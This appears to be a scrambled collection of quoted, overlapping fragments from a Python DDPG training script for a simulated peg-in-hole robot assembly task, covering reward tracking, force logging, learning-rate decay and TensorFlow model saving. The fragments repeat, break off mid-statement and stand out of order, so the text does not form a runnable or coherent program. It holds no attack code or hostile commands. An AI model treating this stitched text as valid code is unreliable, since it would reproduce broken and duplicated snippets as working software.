q_value", "\"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum moments:\"", "= pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) #", "from mpi4py import MPI import numpy as np import pandas as pd \"\"\"First", "only for a single worker\"\"\" # if rank == 0: # saver =", "env.robot_control.CalibFCforce() is False: # exit() delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time =", "epoch_critic_lr = critic_lr / delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset()", "mpi_sum import baselines.common.tf_util as U import tensorflow as tf from mpi4py import MPI", "saver = tf.train.Saver() # else: # saver = None # eval_episode_rewards_history = deque(maxlen=100)", "# forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch ==", "\"\"\"Set up logging stuff only for a single worker\"\"\" # if rank ==", "# episodes = 0 # t = 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce()", "= mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses)", "epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr", "= 0 # episodes = 0 # t = 0 \"\"\"Force calibration\"\"\" #", "== 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if epoch == nb_epoch_cycles", "+ 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step", 
"force and moments\"\"\" # if render: # forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6])", "\"\"\"environment reset \"\"\" agent.reset() obs = env.reset() episode_reward = 0. episode_discount_reward = 0.", "pull the pegs step by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward)", "the exceed force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore()", "env.pull_up() # True env # # if pull_safe is False: # logger.info('Peg-in-hole assembly", "print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch == 0 and cycle ==", "0.2]) # min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by", "+= r delta = r - Long_term_reward # if memory.nb_entries >= batch_size and", "\"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries >= batch_size and param_noise is not", "position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl, al =", "tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore)", "Force_moments = [] epoch_episodes = 0 Long_term_reward = - 0.10 for epoch in", "gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" # if", "0 and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(),", 
"------------------------------------------------- \"\"\" # -*- coding: utf-8 -*- import os import time from collections", "# print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch == 0 and cycle", "Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\"", "epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward", "range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] ==", "= mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] =", "actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None,", "1: logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for", "and moments\"\"\" # if render: # forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) #", "episode_reward = 0. episode_discount_reward = 0. q_value = 0. 
done = False forcement", "calibration\"\"\" # if env.robot_control.CalibFCforce() is False: # exit() delay_rate = np.power(10, 1 /", "reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set", "# Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch == 0 and cycle == 0:", "new_obs, done) obs = new_obs \"\"\"Episode done and start pull the pegs step", "force!!!') # pull_done = False # while pull_done is False and info: #", "action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False):", "logger.info('Pull up the pegs failed for the exceed force!!!') # exit() break \"\"\"Episode", "nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise,", "epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward", "env\"\"\" new_obs, r, done, info, expert_action = env.step(action, t_rollout) episode_discount_reward += gamma *", "action.shape[0] == env.action_dim q_value += q \"\"\"scale for execution in env\"\"\" new_obs, r,", "# pull_done = False # while pull_done is False and info: # pull_done,", "episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3])))", "steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for t_train in range(nb_train_steps):", "= tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" 
agent.reset()", "statistics. compute the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] =", "added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns,", "start pull the pegs step by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward)", "episode_step = 0 # episodes = 0 # t = 0 \"\"\"Force calibration\"\"\"", "agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time", "= None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess:", "gamma + gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\"", "of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps)", "executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim,", "batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2,", "logdir = logger.get_dir() if rank == 0 and logdir: if hasattr(env, 'get_state'): with", "step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') 
epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1", "assembly failed for the exceed force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value)", "None: # agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward", "# eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\"", "Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" # if render:", "Last_average_reward = 0. Number_episodes = 0. for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\"", "logger from simulation_ddpg import DDPG from util import mpi_mean, mpi_std, mpi_max, mpi_sum import", "break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps -", "nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al)", "+ 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs = new_obs \"\"\"Episode done", "is False: logger.info('Peg-in-hole assembly failed for the exceed force!!!') # pull_done = False", "obs = new_obs \"\"\"Episode done and start pull the pegs step by step\"\"\"", "pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\",", "env # pull_done, pull_safe = env.pull_up() #True env # # if 
pull_safe is", "gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \"", "\"\"\"Predict next action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim", "epoch in range(nb_epochs): \"\"\"Show the result for cycle 20 times and Save the", "apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value += q \"\"\"scale for execution in", "saver.save(sess, model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False)", "and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f)", "and start pull the pegs step by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!')", "-0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by {} before executing in env'.format(max_action))", "mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic']", "pull_done is False and info: # pull_done, pull_safe = env.step_up() #Simulation env #", "gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale,", "epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done = False # while pull_done is False", "pull_safe is False: # logger.info('Peg-in-hole assembly failed for the exceed force!!!') # exit()", "\"\"\"Episode done and start pull the pegs step by 
step\"\"\" if done: logger.info('Peg-in-hole", "by step\"\"\" if info is False: logger.info('Peg-in-hole assembly failed for the exceed force!!!')", "the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards),", "q_value += q \"\"\"scale for execution in env\"\"\" new_obs, r, done, info, expert_action", "18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8 -*- import", "force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout", "f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb') as", "logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank == 0 and logdir:", "# episode_step = 0 # episodes = 0 # t = 0 \"\"\"Force", "episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore: saver =", "Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs", "mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions)", "env.plot_force(forcement, t_rollout+1) if epoch == 0 and cycle == 0: forcement.append(new_obs[0:6]) 
Force_moments.append(new_obs[0:6]) #", "tf from mpi4py import MPI import numpy as np import pandas as pd", "critic_lr / delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs =", "import pickle import sys from baselines import logger from simulation_ddpg import DDPG from", "critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50,", "r - Long_term_reward # if memory.nb_entries >= batch_size and param_noise is not None:", "epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions", "-0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by {} before executing in env'.format(max_action)) model_directory", "= r + gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" # if render: #", "-0.2]) logger.info('scaling actions by {} before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent", "the pegs failed for the exceed force!!!') # exit() break \"\"\"Episode failed and", "combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train", "\" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta = r -", "- 1: logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model", "episodes = 0 # t = 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is", "1) if epoch == nb_epoch_cycles - 1 and cycle == nb_epoch_cycles - 1:", "t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs = 
new_obs \"\"\"Episode", "Long_term_reward # if memory.nb_entries >= batch_size and param_noise is not None: # agent.feed_back_explore(delta)", "agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging stuff", "False: logger.info('Peg-in-hole assembly failed for the exceed force!!!') # pull_done = False #", "maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta = r - Long_term_reward #", "'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env,", "action, r, new_obs, done) obs = new_obs \"\"\"Episode done and start pull the", "'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir,", "time.time() - epoch_start_time stats = agent.get_stats() combined_stats = {} for key in sorted(stats.keys()):", "actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps,", "+ str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta", "enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver =", "break \"\"\"Episode failed and start pull the pegs step by step\"\"\" if info", "pull the pegs step by step\"\"\" if info is False: logger.info('Peg-in-hole assembly failed", "info: # pull_done, pull_safe = env.step_up() # pull_done, pull_safe = env.pull_up() # True", "combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] =", "restore=restore) 
logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up", "= 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False: # exit() delay_rate =", "= env.pull_up() # True env # # if pull_safe is False: # logger.info('Peg-in-hole", "if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The", "for a single worker\"\"\" # if rank == 0: # saver = tf.train.Saver()", "= False forcement = [] Last_average_reward = 0. Number_episodes = 0. for t_rollout", "coding: utf-8 -*- \"\"\" ------------------------------------------------- File Name: Simulate_main Description : Author : <NAME>", "model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns,", "# env.plot_force(forcement, t_rollout+1) if epoch == 0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6])", "[] Last_average_reward = 0. Number_episodes = 0. 
for t_rollout in range(nb_rollout_steps): \"\"\"Predict next", "# while pull_done is False and info: # pull_done, pull_safe = env.step_up() #Simulation", "agent.store_transition(obs, action, r, new_obs, done) obs = new_obs \"\"\"Episode done and start pull", ">= batch_size and param_noise is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the", "mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance']", "0 # t = 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False: #", "agent.get_stats() combined_stats = {} for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics.", "# t = 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False: # exit()", "hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if eval_env and", "episode_discount_reward = 0. q_value = 0. 
done = False forcement = [] Last_average_reward", "re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False)", "DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg,", "if render: # forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if", "pull_done, pull_safe = env.step_up() #Simulation env # pull_done, pull_safe = env.pull_up() #True env", "tf.train.Saver() # else: # saver = None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history =", "statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model", "index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key])", "env # # if pull_safe is False: # logger.info('Pull up the pegs failed", "pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',',", "assert action.shape[0] == env.action_dim q_value += q \"\"\"scale for execution in env\"\"\" new_obs,", "exceed force!!!') # exit() break \"\"\"Episode failed and start pull the pegs step", "f) if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb') as f: pickle.dump(eval_env.get_state(),", "done) obs = new_obs 
\"\"\"Episode done and start pull the pegs step by", "pull_safe = env.step_up() #Simulation env # pull_done, pull_safe = env.pull_up() #True env #", "= {} for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the", "reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma,", "force!!!') # exit() break \"\"\"Episode failed and start pull the pegs step by", "mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward),", "t = 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False: # exit() delay_rate", "memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr,", "logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done =", "range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if", "[] Force_moments = [] epoch_episodes = 0 Long_term_reward = - 0.10 for epoch", "pegs failed for the exceed force!!!') # exit() break \"\"\"Episode failed and start", "logger.info('Peg-in-hole assembly failed for 
exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps", "import DDPG from util import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U", "normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size,", "= Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole", "path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise,", "epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries >= batch_size", "in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0]", "pickle import sys from baselines import logger from simulation_ddpg import DDPG from util", "import logger from simulation_ddpg import DDPG from util import mpi_mean, mpi_std, mpi_max, mpi_sum", "and info: # pull_done, pull_safe = env.step_up() # pull_done, pull_safe = env.pull_up() #", "epoch_start_time stats = agent.get_stats() combined_stats = {} for key in sorted(stats.keys()): combined_stats[key] =", "failed and start pull the pegs step by step\"\"\" if info is False:", "+ str(max(abs(new_obs[3:6])))) episode_reward += r delta = r - Long_term_reward # if memory.nb_entries", "pull_done is False and info: # pull_done, pull_safe = env.step_up() # pull_done, pull_safe", "times and Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay the", "model for nb_train_steps times\"\"\" 
for t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr)", "from collections import deque import pickle import sys from baselines import logger from", "exit() delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = []", "mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time()", "= tf.train.Saver() \"\"\"Set up logging stuff only for a single worker\"\"\" # if", "'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step =", "= [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs =", "np import pandas as pd \"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def", "= mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] =", "epoch == nb_epoch_cycles - 1 and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6])", "epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs = [] Force_moments", "= DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise,", "logger.info('Using agent with the following configuration:') 
logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging", "= [] epoch_episodes = 0 Long_term_reward = - 0.10 for epoch in range(nb_epochs):", "t_rollout+1) if epoch == 0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement,", "while pull_done is False and info: # pull_done, pull_safe = env.step_up() # pull_done,", "mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\"", "The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta = r - Long_term_reward", "{} for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the mean", "= [] epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr /", "= mpi_mean(stats[key]) \"\"\"Rollout statistics. 
compute the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] =", "mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save", "Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1:", "= tf.train.Saver() # else: # saver = None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history", "env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for", "os import time from collections import deque import pickle import sys from baselines", "0. done = False forcement = [] Last_average_reward = 0. Number_episodes = 0.", "[] epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = []", "-*- coding: utf-8 -*- import os import time from collections import deque import", "agent.reset() obs = env.reset() episode_reward = 0. episode_discount_reward = 0. 
